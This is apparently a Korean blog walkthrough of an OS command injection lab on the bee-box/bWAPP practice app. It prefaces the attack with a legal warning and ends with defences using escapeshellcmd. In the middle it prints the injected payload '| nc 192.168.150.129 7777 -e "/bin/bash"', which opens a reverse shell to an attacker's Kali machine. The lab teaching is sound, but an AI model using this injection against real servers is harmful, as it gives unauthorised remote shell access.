[Bee-box] 기타 인젝션 공격- OS 커맨드 인젝션

iframe 인젝션 실습에 이어서,

오늘은 인젝션 기법 중 OS 커맨드 인젝션을 실습해볼게요.

실습하는 모든 공격은 실제로 사용하시면 안됩니다.

허용받지 않은 서비스 대상에 해킹을 시도하는 행동은 금지하며,

모든 법적 책임은 사용자에게 있는 것을 명심해주세요

---

 

먼저 실습하기 전에 간단하게 OS Command Injection에 공격 흐름도를 알아보고 시작하도록 할께요.

 

커맨드 인젝션이란 취약한 변수로 시스템 명령어를 주입하여 서버 운영체제에 접근하는 공격입니다.

 

보통 웹 페이지에서 서버의 시스템 셸을 호출할 때, 관리자가 의도한 명령어가 아닌 

다른 명령어를 주입하여 서버 정보를 알아내는 공격입니다.

 

 

'commandi.php'는 입력한 주소의 DNS 주소를 출력합니다. 이때 DNS를 조회하는 명령어인 nslookup을 사용하죠!

 

 

자 그럼 Command Injection을 시작해볼께요!

 

난이도 하

 

먼저 low단계로 들어가줍니다.

 

 

들어가보면

 

 

이런화면이 뜨죠. 

다음과 같이 텍스트 필드에 파이프 라인과 함께 원하는 명령어를 입력 할 수 있는데요.

여기서는 디렉터리의 목록을 표시하는 명령어 ' ls '를 사용해줍니다.

 

파이프라인 ' | ' 은 둘 이상의 명령어를 실행할 때 사용하며, 앞의 명령을 실행 후 파이프라인 뒤 명령어를 실행시킨다.

 

 

이렇게 파이프라인을 사용하여 OS 커맨드 인젝션의 결과로 서버 시스템의 가장 상위에 있는

디렉터리 정보를 출력 할 수 있습니다.

 

 

이렇게 bin dev etc등 상위 디렉터리들이 출력되었네요.

 

OS 커맨드 인젝션에 넷캣(Netcat) 명령어를 입력하면 비박스의 서버 정보를 외부에서 파악할 수가 있는데요.

칼리 리눅스를 실행하여 리스닝 모드로 넷캣을 실행해보도록 하겠습니다.

 

---

 

실습에 앞서, 이 공격은 이해가 다소 어려운 부분이 있을 수 있을 것 같아 

이해를 돕기위해 그림으로 그려보았습니다. 이해하시는데 참고하시면 좋을 것 같아요.

 

 

 

 

 

 

이어서 실습을 시작하겠습니다.

 

먼저 칼리리눅스를 실행하여 명령어를 입력해 줍니다. (sudo su 로 접근해주세요.)

 

 

-l 은 리스닝 모드, -p 는 포트번호를 지정하는 옵션입니다.

 

입력 후 다시 bee-box로 돌아가서 commandi.php 페이지 입력란에 넷캣을 실행하는 명령어를  입력해줍니다.

 

 

| nc 192.168.150.129 7777-e "/bin/bash"  

 

넷캣과 연결하기 위하여 칼리 리눅스의 IP주소와 포트 번호를 인자 값으로 입력해야 합니다.

 

 

칼리 리눅스에서 비박스 서버의 정보를 알기 위하여 명령어를 실행해야 하므로 -e옵션으로 bash셸을 실행해줍니다.

(보안상 -e 옵션을 사용하면 공격자가 활용할 수 있으므로 실무에서는 telnet명령어로 이를 우회합니다.)

 

하여튼! 명령어를 입력 후 Lookup을 클릭하고, 칼리 리눅스로 돌아와서 넷캣을 실행한 터미널에

명령어를 입력하면 서버 정보를 확인할 수 있습니다.

 

 

ls와 같은 명령어를 입력해보았더니 제대로 정보가 확인되네요.

 

--> 시스템 침투 성공

 

대응방안

 

난이도 상에서는 파이프라인을 사용하여도 인젝션 결과가 나오지 않습니다.

commandi.php 페이지의 소스 코드를 확인해보면

 

 

이렇게 commandi_check_2라는 함수로 우회를 하고 있습니다.

 

 

functions_external.php 에 정의되어있는 함수 commandi_check_2 을 확인해보았더니 

escapeshellcmd 함수로 우회하고 있네요.

 

escapeshellcmd  ==> 시스템 셸로 실행할 수 있는 특수 문자에 백슬래시를 붙여

명령을 실행할 수 없도록 방어해줍니다.

사용할 수 있는 우회 문자는 ' #, &, ;, ', |, *, ?, ~, <, >, ^, (, ), [, ], {, }, $, \, \x0A, \xFF, ., ', " ' 가 있습니다.

 

시스템 명령어를 외부에서 사용하지 못하도록 하는게 가장 좋은 대응방안 이지만 ,

부득이 하게 시스템 명령어를 사용하여야 할 경우에는 필요한 명령어 이외에 다른 명령어를 사용할 수 없도록 

위와 같은 문자들을 우회하는 함수를 사용하여 대응하여 줍니다!